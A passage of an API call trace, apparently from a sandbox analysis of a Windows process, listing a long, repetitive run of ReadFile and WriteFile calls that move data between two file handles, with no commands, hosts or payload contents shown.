lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.644] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.645] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.645] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.646] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x216, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.646] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.647] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.647] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.647] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.648] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.648] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x329, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.649] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.649] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.650] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.650] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x313, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.651] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.651] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x394, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.652] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.652] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.653] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.653] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x305, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.654] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.654] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.654] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.655] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.656] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.656] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.657] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.657] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x356, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.658] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.658] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x367, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.658] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.659] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.659] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.660] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.660] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.661] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.661] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.662] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.662] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.663] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.663] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.664] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.664] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.665] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x309, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.665] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.666] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.666] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.667] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.667] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.668] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x328, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.668] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.668] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.669] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.669] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.670] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.670] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.671] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.671] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.672] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.672] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.673] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.673] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x374, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.673] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.674] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x334, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.674] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.675] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.675] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.676] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.676] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.677] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.677] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.678] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x287, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.678] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.679] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.679] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.680] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x324, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.680] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.681] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.681] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.682] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ee, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.682] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.683] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.683] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.684] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.684] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.684] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.685] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.686] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.686] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.687] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.687] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.688] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.688] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.689] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.689] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.690] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x317, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.690] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.691] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.691] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.692] 